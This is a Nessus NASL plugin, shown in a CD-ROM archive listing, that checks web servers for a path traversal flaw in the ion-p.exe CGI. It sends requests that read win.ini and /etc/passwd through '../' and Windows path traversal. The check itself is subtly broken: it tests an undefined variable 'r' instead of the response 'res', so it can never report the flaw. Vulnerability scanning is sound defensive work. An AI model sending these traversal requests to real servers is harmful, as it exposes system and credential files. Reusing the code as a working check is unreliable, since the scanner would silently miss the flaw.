home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / ion_p.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  82 lines
  1. #
  2. # This script was written by John Lampe...j_lampe@bellsouth.net 
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7.  
  8. if(description)
  9. {
  10.  script_id(11729);
  11.  script_bugtraq_id(6091);
  12.  script_version ("$Revision: 1.5 $");
  13.  script_cve_id("CAN-2002-1559");
  14.  
  15.  
  16.  name["english"] = "ion-p.exe vulnerability";
  17.  name["francais"] = "ion-p.exe vulnerability";
  18.  script_name(english:name["english"], francais:name["francais"]);
  19.  
  20.  desc["english"] = "The ion-p.exe exists on this webserver.  
  21. Some versions of this file are vulnerable to remote exploit.
  22. An attacker, exploiting this vulnerability, may be able to gain
  23. access to confidential data and/or escalate their privileges on
  24. the Web server.
  25.  
  26. Solution : remove it from the cgi-bin or scripts directory.
  27.  
  28. Risk factor : High";
  29.  
  30.  
  31.  script_description(english:desc["english"]);
  32.  
  33.  summary["english"] = "Checks for the ion-p.exe file";
  34.  
  35.  script_summary(english:summary["english"]);
  36.  
  37.  script_category(ACT_ATTACK);
  38.  
  39.  
  40.  script_copyright(english:"This script is Copyright (C) 2003 John Lampe",
  41.         francais:"Ce script est Copyright (C) 2003 John Lampe");
  42.  family["english"] = "CGI abuses";
  43.  family["francais"] = "Abus de CGI";
  44.  script_family(english:family["english"], francais:family["francais"]);
  45.  script_dependencie("find_service.nes", "no404.nasl");
  46.  script_require_ports("Services/www", 80);
  47.  exit(0);
  48. }
  49.  
  50. #
  51. # The script code starts here
  52. #
  53.  
  54. include("http_func.inc");
  55. include("http_keepalive.inc");
  56.  
  57. port = get_http_port(default:80);
  58.  
  59. if(!get_port_state(port))exit(0);
  60.  
  61. flag = 0;
  62. directory = "";
  63.  
  64. foreach dir (cgi_dirs()) {
  65.     req = http_get(item: dir + "/ion-p.exe?page=c:\\winnt\\win.ini", port:port);
  66.     res = http_keepalive_send_recv(port:port, data:req);
  67.     if( res == NULL ) exit(0);
  68.     
  69.     if (egrep(pattern:".*\[fonts\].*", string:r, icase:TRUE)) {
  70.             security_hole(port);
  71.             exit(0);
  72.         }
  73.         
  74.     req = http_get(item: dir + "/ion-p.exe?page=../../../../../etc/passwd", port:port);
  75.     res = http_keepalive_send_recv(port:port, data:req);
  76.     if (egrep(pattern:".*root:.*:0:[01]:.*", string:r)) 
  77.     {
  78.      security_hole(port);
  79.      exit(0);
  80.     }
  81. }
  82.